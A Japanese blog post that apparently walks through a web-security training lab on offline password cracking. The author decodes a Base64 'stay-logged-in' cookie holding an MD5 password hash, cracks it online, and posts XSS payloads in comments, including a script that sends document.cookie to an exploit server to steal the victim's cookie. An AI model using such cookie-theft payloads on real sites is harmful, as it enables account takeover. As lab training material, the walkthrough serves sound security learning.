shikata ga nai

Private? There is no such things.

Offline password crackingをやってみた

Hello there, ('ω')ノ

 

オフラインパスワードクラッキングを。

このラボでは、ユーザのパスワードハッシュをCookieに保存して。

ラボには、コメント機能にXSSの脆弱性も含まれていて。

Carlosの stay-logged-inクッキとそれを使用して彼のパスワードを解読して。

carlosのアカウントを削除せよと。

まずは、ログインして。

 

f:id:ThisIsOne:20210411173007p:plain

 

リクエストを確認して。

 

f:id:ThisIsOne:20210411173053p:plain

 

Cookieのstay-logged-inをBase64でデコードすると。

username+':'+md5HashOfPasswordが確認できて。

 51dc30ddc473d43a6011e9ebba6ca770

f:id:ThisIsOne:20210411173258p:plain

 

下記のサイトで、ハッシュをクラックしてみると。

パスワードが確認できて。

注意事項として顧客サイトをテストする際には、Webサイト上のサービスではなく。

セキュリティ上、hashcatなどのツールを使用する必要があって。

 https://crackstation.net/

 

f:id:ThisIsOne:20210411173340p:plain

 

次にコメントにXSSのエクスプロイトを投稿して。

 <img src=x onerror=alert(1) ?>

 

f:id:ThisIsOne:20210411173621p:plain

 

XSSの脆弱性が確認できて。

 

f:id:ThisIsOne:20210411173647p:plain

 

エクスプロイトサーバのURLをコピーしておいて。

 

f:id:ThisIsOne:20210411173932p:plain

 

再度、下記のペイロードを投稿して。

 <script>document.location='https://ac3e1fa31e7143cd80f72330012d00f7.web-security-academy.net/'+document.cookie

f:id:ThisIsOne:20210411174019p:plain

 

アクセスログでで、stay-logged-inを確認して。

 stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz

 

f:id:ThisIsOne:20210411174340p:plain

 

さきほどと同様にデコードして。

 

f:id:ThisIsOne:20210411174421p:plain

 

ハッシュをクラックすると、パスワードがわかったので。

 onceuponatime

f:id:ThisIsOne:20210411174534p:plain


carlosでログインして。

 

f:id:ThisIsOne:20210411174628p:plain

 

Deleteして。

 

f:id:ThisIsOne:20210411174718p:plain

 

再度、パスワードを入力してDeleteすると。

 

f:id:ThisIsOne:20210411174746p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210411174806p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain